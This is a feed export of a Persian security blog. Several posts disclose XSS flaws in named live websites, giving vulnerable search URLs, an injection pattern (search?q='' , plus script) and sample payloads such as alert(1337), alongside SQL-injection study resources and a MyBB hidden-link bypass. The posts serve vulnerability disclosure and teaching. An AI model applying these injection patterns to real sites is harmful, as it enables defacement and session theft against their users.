tag:blogger.com,1999:blog-78139599876747750702011-07-08T18:55:47.300+04:30سکاناروبلاگ شخصی محمد جوانبخت / نوشتاری پیرامون امنیت و ضد امنیت / XSS , SQL Injectionمحمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.comBlogger151100tag:blogger.com,1999:blog-7813959987674775070.post-55310003505165937172010-08-23T14:51:00.000+04:302010-08-23T14:51:32.094+04:30XSS در METAROA.com - قسمت سوم<div dir="rtl" style="text-align: right;" trbidi="on"><div style="background-color: #073763;"><a href="http://secanar.blogspot.com/2010/08/xss-metaroacom_21.html">قسمت قبل</a></div>در این جا کد زیر را تزریق می نماییم :<br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/THJEst5l--I/AAAAAAAAAJ8/j2uON_Xxhl8/s1600/met8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/THJEst5l--I/AAAAAAAAAJ8/j2uON_Xxhl8/s320/met8.jpg" /></a></div>در این حالت مشاهده می شود که XSS برروی بخش MoreTools اعمال می گردد !<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/secanarprojects/met9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://sites.google.com/site/secanarprojects/met9.jpg" width="320" /></a></div><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-5531000350516593717?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-77837421157073147382010-08-21T18:44:00.001+04:302010-08-21T18:55:09.032+04:30XSS در METAROA.com - قسمت دوم<div dir="rtl" style="text-align: right;" trbidi="on"><div style="text-align: right;"><a href="http://secanar.blogspot.com/2010/08/xss-metaroacom.html"><span style="background-color: #0c343d;">قسمت قبل</span></a></div><a href="http://secanar.blogspot.com/2010/08/xss-metaroacom.html"></a><br />... در این صورت خطایی به صورت زیر مشاهده می شود !<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_ZlHoW-9I/AAAAAAAAAJs/Qjftb0rHikU/s1600/met6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_ZlHoW-9I/AAAAAAAAAJs/Qjftb0rHikU/s320/met6.jpg" /></a></div>این خطا مربوط به تزریق یک کد اسکریپت است . اما ما در اینجا از اسکریپت کد خاصی استفاده نکردیم و فقط از یک فرمان ساده ی HTML استفاده نمودیم که این فرمان تنها باید واژه ی XSS را به صورت Header1 نمایش دهد .<br /><br />اما علت این موضوع ...<br /><br />بعد از سرچ ، سرس کد صفحه را بررسی می کنیم !<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_cU-Nb7FI/AAAAAAAAAJ0/4ZnSbBhhgAw/s1600/met7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="8" src="http://4.bp.blogspot.com/_HjC-UOu9N2Q/TG_cU-Nb7FI/AAAAAAAAAJ0/4ZnSbBhhgAw/s320/met7.jpg" width="320" /></a></div>کد فوق در خط 259 سرس کد مشاهده می شود ، در اصل این کد ناشی از محتوای "توضیحات" یکی از موارد یافته شده در جستوجو می باشد ، زمانی که ما از کد HTML موردنظر XSSجهت استفاده کردیم کد فوق که در اصل یک متن بوده به صورت یک کد در آمده ، اسکریپت کد (alert(1337 سبب ایجاد پیغام خطا و HTML کد merquee سبب به حرکت درآمدن واژه ی XSS در سراسر صفحه شده !</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-7783742115707314738?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-20796164520340481382010-08-17T11:22:00.003+04:302010-08-21T17:55:29.816+04:30XSS در METAROA.com - قسمت اول<div dir="rtl" style="text-align: right;" trbidi="on"><div style="background-color: #0c343d; color: #0c343d; text-align: center;"><a href="http://packetstormsecurity.org/1008-exploits/metaroa-xss.txt">لینک ثبت در packetstormsecurity</a> </div>این آسیب پذیری ناشی از عدم فیلتر گذاری مناسب برروی کارکتر های ورودی است . در این صورت بدون هیچ پردازشی بر روی داده های ورودی آن ها به نمایش گذاشته می شوند !<br />کدهای php :<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/secanarprojects/met2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met2.jpg" width="272" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/secanarprojects/met3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met3.jpg" width="259" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://sites.google.com/site/secanarprojects/met4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://sites.google.com/site/secanarprojects/met4.jpg" width="290" /></a></div><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: right;">کد HTML مربوط به فرم سرچ:</div><div class="separator" style="clear: both; text-align: right;"><a href="https://sites.google.com/site/secanarprojects/met1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="62" src="https://sites.google.com/site/secanarprojects/met1.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: right;">اما نکته ی بسیار جالب در مورد این سایت !!!</div><div class="separator" style="clear: both; text-align: right;">کد زیر را به تزریق کردم :</div><div class="separator" style="clear: both; text-align: center;"> <a href="https://sites.google.com/site/secanarprojects/met5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://sites.google.com/site/secanarprojects/met5.jpg" /></a></div><div class="separator" style="clear: both; text-align: right;">اما...</div><div class="separator" style="clear: both; text-align: right;"><br /></div><div class="separator" style="clear: both; text-align: right;"><b style="color: #cc0000;">ادامه مطلب در قسمت بعدی...</b></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-2079616452034048138?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-29920341554233614012010-07-29T20:33:00.002+04:302010-07-29T20:40:10.776+04:30تاریخپه سرویس دهنده های وبلاگ فارسی<div dir="rtl" style="text-align: right;" trbidi="on">همین الآن توی سایت محترم گوگل کلمه "وبلاگ" رو سرچ کردم !!!! با رقم بی سابقه ای از سرویس دهنده های وبلاگ روبه رو شدم !!! واقعآ که جای تعجب داره ! به سال 83 برگردیم اون زمان 2دو سرویس دهنده ی خیلی رایج وجود داشت که بلاگفا و پرشین بلاگ بود به اضافه چندتای دیگه که تعدادشون از انگشت های یک دست تجاوز نمی کرد !(مثلآ بلاگ اسکی و ...)<br />همون زمان بود که یک سرور جدید به نام میهن بلاگ اضافه شد که من پیش خودم گفتم ... اوه چه خبره ...(به نظرم لزومی نداشت که یکی دیگه اضافه بشه) اما انصافآ میهن بلاگ نسبت به بقیه ی سرویس دهنده ها تمایز داشت و وجودش خالی از اشکال بود چون سلیقه های جدیدی رو به خودش جذب می کرد ! حالا چهار سال میایم جلوتر یعنی سال 87 مقاله ای تحت عنوان" آموزش جامع وبلاگ نويسي براي همه" در مجله دانش و کامپیوتر (شماره79) به چاپ رسوندم در این مقاله سعی کردم تمام سرویس دهنده هارو معرفی کنم که در مجموع 8 تا شد که حالا نهایتآ 2 تا از قلم افتاده با شه سر جمع می شه گفت اون زمان کمتر از 10 تا سرویس دهنده فارسی وجود داشت که همشون هم با هم متمایز بودن و سلایق مختلفی رو جذب می کردن ...خب ، و بر می گردیم به زمان حال...<br /><br />با یک حساب سر انگشتی در این لحظه که شما مشغول مطالعه ی این پست هستید چیزی در حدود 20 الی 30 سرویس دهنده وبلاگ وجود داره اگر از ده تا سرویس دهنده ی قدیمی فاکتور بگیریم حداقل چیزی حدود 10 سرویس دهنده ی جدید اضافه شده .<br />با توجه به رشد بیش از حد سرویس دهنده ها ما رشد کیفی قابل ملاحظه ای در طول این چهار سال نداشتیم .<br />بلکه با سرویس دهنده هایی روبه رو هستیم که حتی از لحاظ طراحی صفحه و چیدمان کاملآ با هم مشابه هستند و فرمت کلیشون برگرفته از "بلاگفا" هستش (تعدادشون خیلی زیاد هست و من نامی نمی برم ، خودتون با یه سرچ توی گوگل همه چیز را در خواهید یافت) !!!!<br />اما واقعآ چرا... ؟ من هم دلیل این موضوع رو نمی دونم فقط اینو می دونم که لزومی به این همه سرویس دهنده با خدمات مشابه وجود نداره این که تعداد وبلاگ نویس ها در سال های اخیر بیشتر شده توجیهی بر این موضوع نیست . با ظهور سرویس دهنده های کاملآ مشابه از لحاظ خدماتی تنها تفاوت بین سرویس دهنده های مختلف نام دامنه وبلاگ هستش ...<br />خیلی از این سرویس دهنده ها حتی از لحاظ طراحی سایت بسیار بسیار ضعیف هستند و هیچ شباهتی به یک سایت رسمی ندارن اینو به سادگی می شه مشاهده کرد ...<br />به هر حال امیدوارم که در آینده با رشد کیفی سرویس دهنده های وبلاگ و افزایش ابزار های وبلاگ نویسی روبه رو باشیم !!!!.....تا با ظهور سرویس دهنده های جدید و تکراری !</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-2992034155423361401?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-80119789164896376372010-07-26T18:44:00.002+04:302010-07-28T16:53:37.252+04:30آسیب پذیری XSS در ابزارک دات کام<div dir="rtl" style="text-align: right;" trbidi="on"><b><span style="font-size: small;"><a href="http://packetstorm.linuxsecurity.com/1007-exploits/abzarak-xss.txt">لینک Exploit در packetstormsecurity</a></span></b><br /><br />آسیب پذیری در این سایت مربوط به تگ جستوجو هستش .<br />کدهای تست شده :<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://sites.google.com/site/secanarprojects/abzarak.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://sites.google.com/site/secanarprojects/abzarak.jpg" /></a></div> لینک آسیب پذیری:<br /><div dir="ltr" style="text-align: center;">http://www.abzarak.com/?s=</div><div style="color: #b45f06; text-align: center;">(درمقابل =s باید کد به صورت HEX وارد شود)</div><div dir="ltr" style="text-align: left;"><div dir="rtl" style="text-align: right;">تست شده در مرورگر Mozilla Firefox</div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-8011978916489637637?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-42791777054976913012010-06-24T12:06:00.007+04:302010-07-05T13:53:57.064+04:30برای مشاهده لینک حتمآ باید عضو باشیم ؟<div dir="rtl" style="text-align: right;" trbidi="on">شاید براتون پیش اومده باشه توی گوگل چیزی رو برای دانلود شرچ می کنید و اگر فای مورد نظرتون توی یک Forum باشه ممکنه با این پیغام روبه رو بشید :<br /><br /><div style="color: #76a5af; text-align: center;">متاسفیم ... کاربران مهمان قادر به مشاهده لینک نمی باشند . برای مشاهده لینک باید ثبت نام کنید...</div><div style="text-align: right;"><br /><span style="color: red;"><span style="color: black;">در این صورت شما دو راه دارید یا باید وقت بگذارید و عضو بشید و راه دوم اینه که حوصله ی فرم پر کردن نداشته باشید و مجددآ سرچ کنید تا یک جای دیگه فایلتوتنو بدون دردسر دانلود کنید .</span></span></div><div style="text-align: right;"><br /><span style="color: red;"><span style="color: black;">اما اگر با Forumی مثل Forum زیر روبه رو شدید راه سومی هم وجود داره ...</span></span></div><div style="text-align: center;"><span style="color: red;"><span style="color: black;">http://www.iran-forum.ir/thread-12403-post-104780.html#pid104780</span></span></div><div style="text-align: right;"><br /><br /><div class="MsoNormal"><span dir="rtl" lang="AR-AE">در این حالت نشان گرد موس را روی جعبه ی خطا برده و لینک مورد نظر را در نوار وضعیت مرورگر مشاهده کنید<o:p _moz-userdefined=""></o:p></span></div><div class="separator" style="clear: both; text-align: center;"></div></div><div class="separator" style="clear: both; text-align: center;"></div><div style="text-align: right;"><div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"></div><br /></div><span style="color: red;"> <span style="color: black;"> </span></span><br /><span style="color: red;"><span style="color: black;">این نارسایی در MyBB وجود دارد !</span></span></div><div style="text-align: right;"></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4279177705497691301?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-15149634838983554192010-06-24T10:38:00.006+04:302010-06-25T13:11:20.918+04:30ابزار های لازم برای Sql injection<div dir="rtl" style="text-align: right;" trbidi="on">حملات <a href="http://en.wikipedia.org/wiki/SQL_injection">sql injection</a> احتیاج به نرم افزار خاصی نداره و بیش از هر چیز آگاهی هکر از نوع و عملکرد پایگاه تعیین کننده هستش ، اینجا می خواستم ابزار هایی معرفی کنم که به عقیده ی من یک هکر باید برای این نوع حملات ازش بهره بگیره :<br /><br /><br />1. قبل از هرچیز یک هکر باید علم کافی در زمینه ی پایگاه های داده داشته باشه به این منظور کتاب و مقالات زیادی توی اینترنت و توی کتاب فروشی ها موجود هستش همچنین مطالعه در زمینه php , asp هم کمک کننده هست.<br /><br /><br />2. به طور کلی sql injection cheat sheet ها معجزه می کنند من <a href="http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/">اینو</a> پیشنهاد می کنم .<br /><br /><br />3. یک مقاله هستش با عنوان <a href="http://www.ngssoftware.com/papers/advanced_sql_injection.pdf">Advanced sql injection in sql server application</a> و یک کتاب با عنوان<a href="http://sodaphish.com/files/ebks/try2innovate.com/downloads/E-books/Hacking/Hacking%20Exposed-%20Web%20Applications%20%28MCGraw-Hill-2002%29.pdf">Hacking Exposed- Web Applications</a> که به عقیده من به عنوان یک رفرنس میتونه به شما کمک کنه .(البته انتقادی که بی این دو وارده به علت قدیمی بودنش هست اما این که چیزی قدیمی بشه دال بر بی استفاده بودنش نیست)<br /><br /><br /><div dir="rtl" style="text-align: right;">4.مراجعه به تالار های گفتمان برای اینکه مشکلاتتون رو بتونید مطرح کنید و از تجربه افراد استفاده کنید (من سایت های ایرانیو پیشنهاد نمی کنم به دلیل ....) و همچنین آگاهی از اکسپلویت های روز ، من <a href="http://packetstormsecurity.org/">اینو</a> معرفی می کنم .<br /><br /><br />5. و در نهایت تجربه بزرگترین ابزار شما خواهد بود با انجام پروژه های متعدد Sql injection به این درجه خواهید رسید .<br /><br /><br />این بود مختصری از پیشنهادات من !<br /><br />موفق و پیروز باشید<br /><script></script><noscript></noscript></div><style type="text/css">.gac_od { BORDER-TOP-WIDTH: 0px; BORDER-RIGHT: #e7e7e7 1px solid; PADDING-RIGHT: 0px! important; PADDING-LEFT: 0px! important; BORDER-LEFT-WIDTH: 0px; Z-INDEX: 99; BACKGROUND: white; PADDING-BOTTOM: 0px! important; MARGIN: 0px; PADDING-TOP: 0px! important; BORDER-BOTTOM: #e7e7e7 1px solid; POSITION: absolute } .gac_id { BORDER-RIGHT: #558be3 1px solid; BORDER-TOP: #a2bff0 1px solid; DISPLAY: block; Z-INDEX: 99; BACKGROUND: white; MARGIN: 0px; BORDER-LEFT: #a2bff0 1px solid; BORDER-BOTTOM: #558be3 1px solid; POSITION: relative } .gac_m { BORDER-TOP-WIDTH: 0px; PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 0px; BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 17px; Z-INDEX: 99; BACKGROUND: white; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; CURSOR: default; LINE-HEIGHT: 117%; PADDING-TOP: 0px; POSITION: relative; BORDER-RIGHT-WIDTH: 0px } .gac_wd { Z-INDEX: 100; RIGHT: -1px; BACKGROUND: #999; WIDTH: 1px; POSITION: absolute; TOP: 0px; HEIGHT: 1px } .gac_m TD { LINE-HEIGHT: 22px } .gac_n { PADDING-BOTTOM: 1px; PADDING-TOP: 1px } .gac_b TD.gac_c { BACKGROUND: #d5e2ff } .gac_b { BACKGROUND: #d5e2ff } .gac_a TD.gac_f { BACKGROUND: #fff8dd } .gac_p { PADDING-RIGHT: 4px; PADDING-LEFT: 3px; PADDING-BOTTOM: 2px; PADDING-TOP: 1px } .gac_u { PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 1px; LINE-HEIGHT: 117%; PADDING-TOP: 0px; TEXT-ALIGN: left } .gac_t { FONT-SIZE: 17px; WIDTH: 100%; TEXT-ALIGN: left } .gac_za { PADDING-RIGHT: 5px; FONT-SIZE: 12px; RIGHT: 0px; BOTTOM: 0px; POSITION: absolute; TEXT-ALIGN: right } .gac_bt { PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 7px; WIDTH: 637px; PADDING-TOP: 8px; POSITION: relative; TEXT-ALIGN: center } .gac_sb { FONT-SIZE: 15px; MARGIN: 0.2em; HEIGHT: 28px } .gac_z { COLOR: #c00; WHITE-SPACE: nowrap } .gac_s { FONT-SIZE: 1px; HEIGHT: 3px; row-height: 1px } .gac_c { PADDING-RIGHT: 3px; PADDING-LEFT: 7px; PADDING-BOTTOM: 1px; OVERFLOW: hidden; WHITE-SPACE: nowrap; TEXT-ALIGN: left } .gac_e { PADDING-RIGHT: 3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; TEXT-ALIGN: right } .gac_d { FONT-SIZE: 11px } .gac_h { COLOR: green } .gac_j { DISPLAY: block } .gac_l { LINE-HEIGHT: 18px } .gac_x { DISPLAY: block; LINE-HEIGHT: 16px } .gac_y { FONT-SIZE: 13px } .gac_i { COLOR: #666 } .gac_w IMG { WIDTH: 40px; HEIGHT: 40px } .gac_w { WIDTH: 1px } .gac_r { COLOR: red } .gac_v { PADDING-BOTTOM: 5px } </style></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-1514963483898355419?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-67375679776229389672009-07-30T11:56:00.006+04:302009-07-31T17:55:32.153+04:30رابطه ی علوم هک با شیاطین<div dir="rtl" style="text-align: right;"><div style="text-align: center;"><span style="font-size:130%;"><span style="color: rgb(51, 51, 51);font-size:85%;" ><span><span style="font-size:130%;"><span style="color: rgb(204, 0, 0); font-weight: bold;"><span style="color: rgb(0, 0, 0);">نگاهی به علوم هک از دیدگاه </span>سکانار<br /><br /></span></span></span></span></span><span style="font-size:130%;"></span><div style="text-align: right;"> <p class="MsoNormal"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;"><span style="font-size:85%;"><span style=""> </span><span style="color: rgb(51, 102, 102);font-size:100%;" >.... شیاطین ، نابودگر، پسرهای شیطالن و..... از القاب هکرهای مصرفی می باشد. علت اینکه این هکرها مصرفی خوانده می شوند این است که وابسته به دست آوردهای هکرهای سطح بالاتر می باشند. حیطه ی فعالیت این دسته عموما تخریب و کسب اطلاعات محرمانه به قصد سودجویی است و به علوم هک و امنیت صرفا مانند پدیده ای برای سرگرمی می نگرند ، بیشتر شبیه به یک بازی کامپیوتری تا یک علم .</span></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;">اما اصولا هک چنین چیزی نیست ؛ هک یک علم تخصصی وابسته به علوم شبکه است و در</span></span><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;"> ارتباطی تنگاتنگ با امنیت می باشد,به صورتی که این دو مقوله کاملا به هم متصل بوده و غیر قابل تجزیه است . کسی که ادعای دانش هک دارد ناگزیر باید امنیت را بشناسد تا بتواند بر آن غلبه کند و همچنین متخصص امنیت کسی است که بتواند با مقوله ی هک آشنا باشد تا شیوه های مقابله با آن را پیشنهاد کند .<o:p></o:p></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;">بنابراین اولین وابستگی علوم هک به اصول شبکه و امنیت شبکه می باشد. پس از آن مهمترین فاکتور، برنامه نویسی و آشنایی با دنیای کدهاست و ادعای هکرها بدون دانش برنامه نویسی ادعایی بی اساس است . البته مفهوم این جمله آن نیست که هکرها باید بر تمامی زبان های برنامه نویسی مسلط باشند اما با زبان های وابسته و پر کاربرد در علوم هک باید آشنایی کامل داشته باشند و فاکتور سوم قدرت تجزیه و تحلیل بالا و مهندسی مبانی فوق می باشد .<o:p></o:p></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;">اصولا جایگاه هک در آنجا مطرح است که امنیت حضورداشته باشد ،هکر با آنالیز امنیت و با به چالش کشیدن آن راه را برای اقدام متخصصین به منظور ارتقاء امنیت باز کند و این ارتقاء امنیت راه را برای اهداف سودجویانه و تخریب کارانه کاهش می دهد . بنابراین در اصل، علوم هک و امنیت, علومی است تخصصی و فوق تخصصی که هدف آن ارتقاء امنیت سیستم های رایانه ای و در حد والاتر شبکه های رایانه ای می باشد. <o:p></o:p></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;">اکنون در حد تخصصی تر، هک و امنیت در کلیه ی بخش ها حضور دارند. به طور مثال هک وبسایت؛ خود مقوله ای تخصصیاست که خود آن به بخش های فوق تخصصی که شامل متدهای مختلف است تقسیم بندی می شود. حال هکران متخصص با شناسایی روزنه های امنیتی آن را بارز کرده تا را حل هایی برای بستن آن یافت شود، و در ینجا هممان شیاطین با استفاده از روش های ارائه شده توسط متخصصین اقدام به تخریب سوژه های ضعیف، به منظور خودنمایی می کنند.<span style=""> </span>این خودنمایی تا آنجایی پیش می رود که با استفاده از همین احساس قدرت، اقدام به انتشار مقالات و مطالب آموزشی می کنند که چون این مقالات و مطالب بر اساس مبانی علمی نیست و فقط جنبه ی عملی دارد، دارای ایراداتی فاحش و بیانی غیراستاندار می باشد.<o:p></o:p></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;">اقدام به دیفیس ( تغییر شکل صفحات سایت) شاید جذاب ترین بخش هک برای هکرهای مصرفی است که با ثبت آن خود را رکورددار می کنند. و جالب اینجاست که هر کدام ازاین دیفیس ها بر اساس متد هایی است که متخصصین و محققین به ثبت رسانده اند .منتها حق ادعای آن برای شیاطین دنیای وب همیشه محفوظ است .<o:p></o:p></span></span></p> <p class="MsoNormal"><span style="font-size:100%;"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;"><span style=""> </span>در این مطالب سعی گردید که دنیای هک را شفافتر بیان گردد تا بتوان گفت که شیاطین هک کجای این دنیا قرار دارند.<o:p></o:p></span></span></p> <p class="MsoNormal"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;"><span style="font-size:100%;">با تشکر – محمد جوانبخت</span></span></p><div style="text-align: left;"> <span style="color: rgb(0, 153, 0);"> پاینده باد ایران</span><br /></div><p class="MsoNormal"><span dir="rtl" lang="AR-SA" style="font-family:Tahoma;"><o:p></o:p></span></p></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-6737567977622938967?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-43451655554250416852009-07-15T17:38:00.006+04:302009-07-15T18:14:25.308+04:30آسیب پذیری جدید HTML code or XSS, ''<div style="text-align: center;"><span style="color: rgb(204, 0, 0);font-size:130%;" ><span style="font-weight: bold;">, ''</span></span><br /></div><div dir="rtl" style="text-align: right;">کدی متمایز دیروز پیدا کردم و به این صورت هستش :<span style="color: rgb(204, 0, 0);"><br /></span><div dir="ltr" style="text-align: left;"> XSS search?q=<span style="color: rgb(204, 0, 0);font-size:100%;" >'' ,</span> <span style="color: rgb(102, 102, 0);">[HTML code or XSS]</span><br /></div>یعنی بعد از وارد کردن کارکتر های , '' می تونید کد های XSS و یا HTML وارد کنید !<br />این مورد مربوط به آرایه های سرچ می باشد .<br />این آسیب پذیری متناسب با تاریخ پست در سایت www.aftablog.com در تگ سرچ قابل مشاهده است .<br /><br />مثال برای HTML :<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3Zti9LGfI/AAAAAAAAAGM/E-7mIVKOLFk/s1600-h/1.gif"><img style="cursor: pointer; width: 400px; height: 248px;" src="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3Zti9LGfI/AAAAAAAAAGM/E-7mIVKOLFk/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5358678508141484530" border="0" /></a><br /><span style="font-size:85%;">نمونه کد HTML را در input مورد نظر قرار دهید (این کد فقط یک مثال است)<br /></span><div style="text-align: right;"><span style="font-size:100%;">مثال برای XSS :</span><br /></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3bAObp0LI/AAAAAAAAAGU/MlsykITiKJo/s1600-h/2.gif"><img style="cursor: pointer; width: 359px; height: 16px;" src="http://1.bp.blogspot.com/_HjC-UOu9N2Q/Sl3bAObp0LI/AAAAAAAAAGU/MlsykITiKJo/s400/2.gif" alt="" id="BLOGGER_PHOTO_ID_5358679928561324210" border="0" /></a><br /><br /><br /><br /><br /><div style="text-align: left; font-weight: bold; color: rgb(0, 153, 0);"><span>پاینده باد ایران</span></div><br /></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-4345165555425041685?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-39036885750321559742009-07-13T16:08:00.005+04:302009-07-13T17:24:41.212+04:30خطر امنیتی در bahar-20.com<div style="text-align: center;"><span style="color: rgb(255, 0, 0);">HTTP MS Unsafe ActiveX Obj Instantiation</span><br /><br /></div>دیروز در حین بازدید از وبسایت بهار بیست که در زمینه ی وبلاگ و وبسایت فعالیت میکنه با این پیغام از طرف NIS مواجه شدم !<br /><div dir="rtl" style="text-align: right;">این خطا مربوط به ActiveX هستش که از طرف شرکت بزرگ Symantecخطر ناک اعلام شده ...<br />این آسیب پذیری مربوط به کلیه ی نسخه های Internet Explorer هست .<br /><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SlsgLU8EOKI/AAAAAAAAAGE/TLYg5wSooaI/s1600-h/1.gif"><img style="cursor: pointer; width: 400px; height: 250px;" src="http://3.bp.blogspot.com/_HjC-UOu9N2Q/SlsgLU8EOKI/AAAAAAAAAGE/TLYg5wSooaI/s400/1.gif" alt="" id="BLOGGER_PHOTO_ID_5357911560658630818" border="0" /></a><br /></div><br /><a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864">لینک سایت</a><a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864">symantec</a><br /><a href="http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=21864"></a><br />البته این مسئله رو در تعداد زیادی وبلاگ دیدم که اغلب محتوای هک داشتند !<br /><br /><div style="text-align: left; color: rgb(0, 153, 0); font-weight: bold;"><span>پاینده باد ایران</span></div><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7813959987674775070-3903688575032155974?l=secanar.blogspot.com' alt='' /></div>محمد جوانبختhttp://www.blogger.com/profile/03809211800879576622noreply@blogger.com0tag:blogger.com,1999:blog-7813959987674775070.post-49044473385870496142009-07-10T19:52:00.003+04:302009-07-10T20:33:46.979+04:30کره ی شمالی،هک را نظامی و سیاسی کردیکی از مواردی که خیلی انتظارش می رفت رخ بده این بود که هک به عنوان ابزاری سیاسی و نظامی مطرح بشه و ازش در حد وسیعی استفاده بشه ! اولین باری که این مسئله به طور جدی برای من مطرح شد وقتی بود که مشغول بازی Generals بودم در اون بازی ارتش چین سربازهایی رو داشت که نوت بوکشون رو در می آوردن و مشغول به هک کردن دشمن می شدن . از اون روز تا الان چند سالی می گذره که در حال حاضر این مسئله به یکی از مهمترین اخبار جهان مبدل شده که کره ی شمالی اقدام به هک کردن و کسب اطلاعات محرمانه از کره ی جنوبی و آمریکا کرده و کره ی جنوبی هم یک یگان جنگ سایبر رو می خواد به منظور دفاع راه اندازی کنه البته این مسئله مسئله ی جدیدی نیست پیگیری لینک های زیر می تونه نشون بده این عملیات سازماندهی شده بوده<span style="font-size:85%;"></span><span style="font-size:85%;"><br /></span><div align="left"><a 